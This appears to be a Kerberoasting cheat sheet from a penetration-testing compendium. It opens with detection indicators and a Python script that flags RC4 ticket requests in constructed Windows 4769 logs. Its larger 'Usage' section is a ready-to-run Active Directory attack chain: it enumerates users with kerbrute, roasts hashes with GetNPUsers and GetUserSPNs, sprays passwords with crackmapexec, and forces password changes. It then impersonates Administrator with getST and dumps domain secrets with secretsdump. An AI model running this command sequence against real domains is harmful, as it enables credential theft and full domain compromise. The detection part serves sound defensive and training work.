Kerberoast

An indicator for Kerberoasting is a downgrade to RC4 encryption instead of AES, i.e. Ticket_Encryption_Type=0x17 (RC4-HMAC) instead of 0x12 (AES-256).

The event ID for a TGS request, which is what Kerberoasting needs, is 4769.
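As an added detection example (not part of the compendium), the following Python script applies the two indicators above to constructed, flattened 4769 records: it keeps only successful TGS requests with TicketEncryptionType 0x17, ignores krbtgt and computer-account (name$) service names to cut noise, and groups the remaining requests by requesting account. The key=value line format and the SAMPLE_4769 data are assumptions made for the example; the field names are those of the Windows 4769 event.

```python
import re
from collections import defaultdict

# Constructed sample events (not real logs): flattened Windows Security 4769/4768
# records, one per line, in key=value form. Field names follow the 4769 schema.
SAMPLE_4769 = """\
EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=10.0.0.5
EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=WS01$ TicketEncryptionType=0x12 Status=0x0 IpAddress=10.0.0.5
EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 Status=0x0 IpAddress=10.0.0.42
EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_http TicketEncryptionType=0x17 Status=0x0 IpAddress=10.0.0.42
EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 Status=0x0 IpAddress=10.0.0.42
EventID=4769 TargetUserName=carol@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 Status=0x0 IpAddress=10.0.0.7
EventID=4768 TargetUserName=dave@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 Status=0x0 IpAddress=10.0.0.9
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")
RC4_HMAC = 0x17  # Ticket_Encryption_Type for RC4-HMAC; 0x12 would be AES-256

def parse_event(line):
    """Turn one flattened key=value record into a dict."""
    return {k: v for k, v in FIELD_RE.findall(line)}

def is_rc4_tgs_request(ev):
    """True for a successful 4769 that handed out an RC4 service ticket for a
    user service account. krbtgt (TGT handling) and computer accounts (name$)
    are excluded: they are not what Kerberoasting targets and only add noise."""
    if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
        return False
    if int(ev.get("TicketEncryptionType", "0"), 16) != RC4_HMAC:
        return False
    svc = ev.get("ServiceName", "")
    return svc.lower() != "krbtgt" and not svc.endswith("$")

def find_kerberoast_candidates(log_text, min_spns=1):
    """Group RC4 service-ticket requests by requesting account and return the
    accounts that asked for at least `min_spns` distinct service names."""
    by_user = defaultdict(set)
    for line in log_text.splitlines():
        ev = parse_event(line)
        if is_rc4_tgs_request(ev):
            by_user[ev["TargetUserName"]].add(ev["ServiceName"])
    return {u: sorted(s) for u, s in by_user.items() if len(s) >= min_spns}

if __name__ == "__main__":
    for user, spns in find_kerberoast_candidates(SAMPLE_4769, min_spns=2).items():
        print(f"possible Kerberoasting by {user}: RC4 TGS for {', '.join(spns)}")
```

Raising `min_spns` trades sensitivity for precision: one RC4 ticket can be a legacy service, while one account pulling RC4 tickets for many SPNs in a short window is the typical roasting pattern.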

Usage

List users

kerbrute userenum -d $DOMAIN --dc $TARGET_IP $USER_LIST
kerbrute userenum --dc $TARGET_IP --domain $DOMAIN $USER_LIST --downgrade

Get Users

  • Impacket's GetNPUsers.py to get hashes for the user list
GetNPUsers.py -no-pass <DomainName>/ -usersfile users.txt -format john -outputfile hashes

Find SPNs

GetUserSPNs.py -request <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP

or

pywerview get-netuser -u <USER> -p <PASSWORD> -t <SUBDOMAIN> -d <DOMAIN>

Further Intel

findDelegation.py -debug <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP

Check Found Users

Use crackmapexec to check whether the password of the user found with GetNPUsers.py also grants access to further user accounts

crackmapexec smb $TARGET_IP -u users.txt -p pass.txt

Watch out for STATUS_PASSWORD_MUST_CHANGE

Change password with

smbpasswd.py <user>@$TARGET_IP -newpass password123

Impersonate

getST.py -spn <USER>/<SUBDOMAIN> -impersonate Administrator '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip $TARGET_IP
  • The service ticket is saved as Administrator.ccache
  • export KRB5CCNAME=Administrator.ccache

After that, dump the secrets:

secretsdump.py -k -no-pass <DOMAIN>